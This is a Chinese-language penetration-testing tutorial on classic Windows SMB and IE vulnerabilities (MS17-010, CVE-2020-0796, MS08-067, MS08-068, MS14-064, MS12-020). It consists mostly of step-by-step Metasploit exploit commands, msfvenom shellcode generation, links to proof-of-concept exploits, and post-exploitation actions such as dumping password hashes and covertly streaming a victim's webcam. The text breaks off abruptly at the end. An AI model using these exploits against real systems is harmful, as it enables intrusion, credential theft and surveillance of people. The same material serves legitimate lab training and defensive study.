Windows经典漏洞

永恒之蓝MS17-010

永恒之蓝介绍

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。其中漏洞编号为MS17-010,利用多个SMB远程代码执行漏洞,可在无交互的情况下获取系统最高权限,又为远程代码任意执行。

445端口开放,可能存在MS017-010漏洞

search ms17-010
> use auxiliary/scanner/smb/smb_ms17_010
>set rhost 192.168.93.133
> set rport 445
> show option
>exploit或者run

 发现永恒之蓝漏洞,开始调用漏洞利用模块按照以下参数来进行攻击
>use exploit/windows/smb/ms17_010_eternalblue
>set rhost 192.168.93.133
>set lhost 192.168.93.132
>set payload windows/x64/meterpreter/reverse_tcp
> exploit
 1 .捕获桌面:

meterpreter screenshot

2 .监视器打开

meterpreter webcam_stream

kali会自动打开浏览器播放被攻击的电脑摄像头,被攻击的电脑摄像头也会变亮

3.获得用户密码
密码为hash加密值,可以利用在线解密进行破解
meterpreter > hashdump

 4.sysinfo查看系统信息

永恒之黑 CVE-2020-0796

简单形成介绍:

  该漏洞是Windows10在处理SMB 3.1.1协议的压缩消息时,对头部数据没有做任何安全检查,直接使用,从而引发内存破坏漏洞,达到任意命令执行。

攻击目标:

  漏洞主要攻击端口为445,但也会有其他触发方式如,构造恶意的SMB服务器并通过网页、压缩包、共享目录、OFFICE文档等多种方式传递给目标用户

​ 当用户打开恶意文件,无需开启445端口就可以触发漏洞

影响版本:

  通过此漏洞获取到的权限为系统最高权限

  不影响win7,影响Windows 10 1903之后的各个32位、64位版Windows,包括家用版、专业版、企业版、教育版。

  Windows 10 Version 1903 for 32-bit Systems
  Windows 10 Version 1903 for x64-based Systems
  Windows 10 Version 1903 for ARM64-based Systems
  Windows Server, Version 1903 (Server Core installation)
  Windows 10 Version 1909 for 32-bit Systems
  Windows 10 Version 1909 for x64-based Systems
  Windows 10 Version 1909 for ARM64-based Systems
  Windows Server, Version 1909 (Server Core installation)
  • 首先判断是否存在漏洞

https://github.com/ly4k/SMBGhost

python scanner.py 192.168.90.100

出现 Vulnerable 则表示成功

  • 打蓝屏

https://github.com/eerykitty/CVE-2020-0796-PoC

python3 CVE-2020-0796.py 192.168.1.133
  • 拿shell

https://github.com/chompie1337/SMBGhost_RCE_PoC

1:在KALI系统内下载漏洞利用exp

git clonehttps://github.com/chompie1337/SMBGhost_RCE_PoC.git

2:使用Msfvenom生成正向连接攻击载荷(木马) 端口为:6666

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -b '\x00' -i 1 -f python
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -b '\x00' -i 1 -f exe

说明: 1 #-p payload 2 #-e 编码方式 3 #-i 编码次数 4 #-b 在生成的程序中避免出现的值 5 #LHOST,LPORT 监听上线的主机IP和端口 6 #-f exe 生成EXE格式 7 #‘\x00‘转义字符,对应ascall码中为null,因为是二进制文件所以会出现,在python中作为结束的标志,有点相当于%00截断的感觉。

3:用生成的shellcode将工具目录中exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)小诀窍,先整体粘贴复制,然后将buf += 替换为 user_paload,就不用一行一行粘贴了,节省了很多时间。以下是exploit.py替换后的内容:

4 :打开msfconsole监听目标机指定端口[端口:6666]

1 msfconsole 2 use exploit/multi/handler 3 set payload windows/x64/meterpreter/bind_tcp 4 set lport 6666 //目标端口 5 set rhost 172.18.132.88 //目标机ip 6 run

5:运行exploit.py脚本,反弹shell

python3 exploit.py -ip 192.168.1.133

6:msfconsole已经连接到了目标机进行权限维持

MS08-067 RCE漏洞

MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。SMB(server massage block)在windows操作系统中是默认在139/445端口开放的,该协议主要用来共享文件等。基于该协议的漏洞也有不少,当然,ms08067是最有名的一个。

漏洞验证

nmap --script=smb-vuln-*.nse --script-args=unsafe=1 192.168.2.139

漏洞攻击

打开msfconsole,查找该漏洞利用框架
search MS08-067
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp,然后选择payload

show options
search payload windows/meterpreter
set payload windows/meterpreter/reverse_tcp 
show targets
set  target  xx
set  rhost  192.168.244.138
exploit

MS08-068 NTLM反射

在早期的 SMB 重放攻击中, 允许将 Client 请求的数据包重放至 Client 本身, 这就造成了 MS08-068 漏洞, 但漏洞在 2008 R2 中已经被修复.

微软在 Server 系列的系统中默认开启 SMB 签名以防止重放攻击, 而个人系统诸如 Windows 7, Windows 10 则默认关闭签名.

SMB 协议中的 NTLM 反射漏洞仅针对 Windows 2000 到 Windows Server 2008
此漏洞允许攻击者将传入的 SMB 连接重定向回它来自的计算机,然后使用受害者自己的凭据访问受害者计算机
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068
msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > show targets

MS14-064

漏洞影响版本

Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8 和 Windows 8.1
Windows Server 2012 和 Windows Server 2012 R2
Windows RT 和 Windows RT 8.1
服务器核心安装选项
use exploit/windows/browser/ms14_064_ole_code_execution
set AllowPowershellPrompt true
set lhost 192.168.109.128
exploit

打开win7的ie浏览器,访问这个恶意url

可以看到在kali的msfconsole里面成功收到会话

MS12-020 DoS/蓝屏/RCE漏洞

1、靶机具有MS12_020漏洞,windows2003、windows2008

2、靶机开启3389端口

search ms12-020
pei'zhi'yi
0%